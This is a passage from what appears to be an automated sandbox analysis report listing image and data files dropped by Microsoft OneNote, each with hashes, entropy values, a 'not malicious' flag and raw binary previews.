                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13084
                                                                                                        Entropy (8bit):7.940058639272698
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                        MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                        SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                        SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                        SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.*[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj*....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u........*..OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..*//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................)**,**...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....|r1
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1924
                                                                                                        Entropy (8bit):7.836744258175623
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                        MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                        SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                        SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                        SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19235
                                                                                                        Entropy (8bit):7.944867159042578
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                        MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                        SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                        SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                        SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.950380155401321
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                        MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                        SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                        SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                        SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16003
                                                                                                        Entropy (8bit):7.959532793770661
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                        MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                        SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                        SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                        SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..>.IDATx^..|.....+)..H..C.K... ....x).rU..T..*E...;....*.@Z.....@...9q.g7[fgggg.............1//.."@....0..#.t..f.C..."@.....@OIR.#P...0..$...y.Pl"@....( @zJ]...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....p.T... ........ ... =..#.B.... =.>@........4.)."@....).."@...4.HO..H..."@.HO...."@..!@z*.GJ...."@zJ}...." ...Si8R*D.....S..D....i...J.R!.D....R. .D..HC..T..... .D...... .D@.....y.?.`.T... .f.P...$47........~E....!.D..X............].`....0..N.a...>[||...t.T.w *.. .....)'...=X?c.......+OE....<-84...=.....w.8...7.Ro&.D@!...GS.....s.......:...Gg..8..T...u...~..............<...S...../Y.......W........#. .vB...u.. .+.999YYY......wf..._.{6....=..]>Y?..;=02eb......2...;.%..\...P..R5....XMO.....6....W]...3g.5;.n{t.......F7S....r...[n.......AAX..j[.j.;.neef).2.....{ ..r..{7.-........i..S........<..pm.u.V....M.333....K..Mr.s..Ek..=t_.#.P...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4190
                                                                                                        Entropy (8bit):7.94161730428269
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                        MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                        SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                        SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                        SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......Y.....?.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]ip...fu.VBBZ..V'.>........CR......?r...pU\....v*...T~.U)0..('`....."..,a..Y..$t!...D...Mkvf4.VhW;S........{...zZw...i......fj..$..7......[Z*.[.[..Zk...?.t:M..,..`.^...X,..sUK[..Rg.=$..!.3<....74...iY..i...k.,.fA..Z.n...`G.%..H.l7..7J...u.R..6....E..!....N@.....M....Q`...U2.w.WP[!fX......c ./@7Mz....^...k.)....v.Q`..z..1A..P.{...||...vY.....>.`...K...m.?CX./v.8.....]..;...6..kw......N....z.Q...f..q..xk.5....;.?.Z.c...`......4....?.....VV.u~..<_......sU4e.....g.c.G....O/..r...`.G)....#d5.O..w..{....twL1l.)#&hF..K...M[@.Dl..V2..j.3..s....3M.....v..!....V..c..B...|..e.1....7.WA0.[.\.u.).$7f.+.......8..e2K/.%.Ii..`w6w.E..[?_.?.?..I.k2.s....]..f....HM.?w..d.9..Rr....Y.c.}.s.zk..rc...a..I(9~........m...Z............I........7.K:.:Bf.......m..1.......&..,...?a...c.@.@.g%...s.#...;..c6...g.lZ....}.WX.3.8.....W....N.w...L...}....?.".......;cI.............pS
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 700x114, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2266
                                                                                                        Entropy (8bit):5.563021222358941
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:TuRCTP9rSTfIEe1HbcVY1YbDXq8eCI0bf2QQe0GVDQAzZw:aRCTN7HbcW1YbDXq+I07Ien0AVw
                                                                                                        MD5:DB8A181E3F0EAD4A9472099E42ED6BE3
                                                                                                        SHA1:92096AF05CC6167B1AA816811A1160B809393FA2
                                                                                                        SHA-256:E9746B4E9AE9CE7B3B0068779DB3E113E2DFC9880F25373D745D0E700E69A906
                                                                                                        SHA-512:A9E246E10E28D057090BA9F034ECE6131780D7F794C5C9421523388997C7EDFBB49BC32B863B6C6668911B359C304AA54969B48CB9234950D5CECD2A6F3EFFF8
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....C....................................... ! ..''**''555556666666666...C......................&.....&,$ $,(+&&&+(//,,//666666666666666......r...........................................5.......................!1AQ..2a...."Rq..#3BSr..C..................................................................?...X.....U...j...F.W.V]'KV.uWt.iT...{.......`.(.....V%..=.....z......V..ct+.U.B...@.............................................{.....5.........0...x4....c..;...........+......|.7E.%.9.1+}..d.........+.V#.P.HUL.E...g.li...8.>U.";0pi.]5.\..zo..."@.........................................y.6.mLN..S.....@...i..A..p.......~|V9.+.Xy.........+,L.....7Z7..p...-X...\.....:-...i....v.1...-..H....9.zk....l....^.......:.."^.t.Q.F...X..B..$............................................a.%f&3..1.5+.X..'b7bwr.).e.x....!...H...aa_..kD...b..g..p..K^.k..qX.[,.........Q...U..x...YMvj...w..:k.....j.W.8..4....c.u.}m.....o.=@.......j.S.t.|.....5h.y.%.~...G
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 17x608, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1873
                                                                                                        Entropy (8bit):7.534961703340853
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:N9YMw9kGzE4xTdow1C3kyIkyM66KeJY3fOxJ:/h8HzE4xTdoUCUyxyD6LCvSJ
                                                                                                        MD5:4FC8500BD304AD127AF4B5E269DFF59B
                                                                                                        SHA1:9A5E3432358A0FCDECE86AEB967319B93A65D14A
                                                                                                        SHA-256:B4DAA90D5A53FCBC85119050B5B76962443C4DD18D7F42CDC6D4E0AD8EFAD872
                                                                                                        SHA-512:E5E07054A522EB91EFD39722AFB3776389632B8F5F923C1D29796716D68CEC93BE5E44F79913804CEC7ED631FF520CBBBAAB841E01FB90AF8E8ADF84DCD47481
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......`...."........................................>.......................tu.....45.!#$%1s."fr...2Fq..AQe.Eav............................... .........................!AQR.............?..e4.bbu."m.G......u.S.-Qq.b.a..'#..E.......u.|:.f[O..jS.S.&....=.....[.....S...N.~~...'...q....N.T.Oyf..a.6..%.I.1j.e~.4..[5.WW.Y..Xp.gn...u.......Gb.O.W..k.!mJgfq....~.F.......m..}bn4.5........s,F...z.b)..O..*...5).-.-\....=`.fP....%...A..Q.&..9.....QQbD.%.:u.f...r$.10..W.F.T..MI...9...ZQH._..).....D..n.F].........*.:.j...!6Z..S....0...B.6..Ga..S.O.....U8S_.J.>...i..?..<.P..........M..F.T.C..7.E...`.4BKcMh1j....4y...+.|.^......2[.WG.W..+......E..r/V^".R...."..6..hht..f...........;E..Kx....)}Le.A.x.>..$/).._S.n.L......}..H^Sw...2. .v.io...../.........x.>..$/).._S.n.t^;O.....n...[.S...h.v.io...../....:/...[..7yK.c-
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 40 x 650, 8-bit colormap, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):647
                                                                                                        Entropy (8bit):6.854433034679255
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
                                                                                                        MD5:DD876AA103BEC3AC83C769D768AD39FB
                                                                                                        SHA1:1833603AA9B6A7E53F9AD8A336F96CCE33088234
                                                                                                        SHA-256:1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
                                                                                                        SHA-512:946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14177
                                                                                                        Entropy (8bit):5.705782002886174
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                        MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                        SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                        SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                        SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):29187
                                                                                                        Entropy (8bit):7.971308326749753
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
                                                                                                        MD5:DF99CAAAB9A7DE97B63343E60A699AB6
                                                                                                        SHA1:B84334135CFB73BC6EF55F85926770D5AC6DFEA8
                                                                                                        SHA-256:74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
                                                                                                        SHA-512:5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;*.'.f.5^.....m..<$....8.R.j.D.v..>...*dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%.*.S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..|D...+...NA....Y.^f.1|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N.....*.U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):179460
                                                                                                        Entropy (8bit):7.979020171518325
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3072:oiKXvL7lv0am/R1vrdH+9dK6zPQ6bbnGDpcGGDNMIOIMAT8q9Vc02Q57S4A+vMFz:+vlvC/HvgA6fGqGGJlO1qZ71W6CzDn
                                                                                                        MD5:4E131DBFEC5C2462273CA7B35675B9D9
                                                                                                        SHA1:CA037F444D819A118AC37D7AA3782B9BF94C1616
                                                                                                        SHA-256:2A4A3530D652E227DDD5ADC096A95F6034718F7C380B07DB622022D768815059
                                                                                                        SHA-512:C333ECEB1439D0238BF44FB7896E62DBA4C645B70413AA0F99C1F10E8DCD20C2EEE5C83F2E9DDE9A2494C85A6D8D13CFFFC4160E2F598E17867015F5244D656A
                                                                                                        Malicious:false
                                                                                                        Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!.1AQ.aq...".....2Rr..Bb..#34.....CSs.$5c.t....%.Dd.6.T..u.U....E.7w........................!.1A.Qaq......2."r.3....BRb.#4......CsSc...$.5..%.DT.t67d..Uu...'............?..c.......p..z..i.....z......kj........F>f......3N...M....RM.&..-.~.Q..'.....q.a..w...-~......g.{..&.......V.n.D....>FS!n.....@..)...W..q..Wr{..J.gf.{.M$.P@m.,..9..&m.D...w.._...-.O........s.....h.k~......(.K...V..l.-...+.9.k......*......#.p#.O..9M..mF...C.......7+.AI....4vw.;..H......e..Q.u[.eUK.....z.....[.Kt...s..Lf.4..l{.....sh.............=..;..iqkj.m.a...NH......v..H..$..q.y......c...U[Mcf.......+...S-...^....4..T..YtL.x.v.;.....<...Ik|B.$.s8......3.+.8.l.. h.:....%B..W..I.QRS..,*x.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                        Category:dropped
                                                                                                        Size (bytes):32656
                                                                                                        Entropy (8bit):3.9517299510231485
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                        MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                        SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                        SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                        SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                        Malicious:false
                                                                                                        Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4744
                                                                                                        Entropy (8bit):0.6428946673015394
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:RaUnVYyfB3h1RRXUnfuWIYH/PtjoOHKx5btgqtJRujlw//0lweI/O3qt7Rujd:RagYyf9/UfuWfH3xoOg5bCqEWf/gqs
                                                                                                        MD5:0A06A762FEED6C1B709338A621ABF96A
                                                                                                        SHA1:43E4DEE0B24C03C76F4439CC6ABC0EB7C6EF03D6
                                                                                                        SHA-256:D908485E63B8A597F51523B07A1E30F20012401DAC167769769BEB81604C276D
                                                                                                        SHA-512:FFA3E48994C1237A6AE9920D0FD7B4C7204291434A00D8D0A638679D967C9C9162F6E22902FE4E22E603E7459E3F9F0579A09610BDCF90466E41A5EBEFD92378
                                                                                                        Malicious:false
                                                                                                        Preview:./.C..vL....W"v_.B.7p..I. ...x.0................?.....I...............................................................................................................h.............................................IhKi.G...G>..............zu..A.>...................................7...7...7...7..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):17289
                                                                                                        Entropy (8bit):7.962998633267186
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                        MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                        SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                        SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
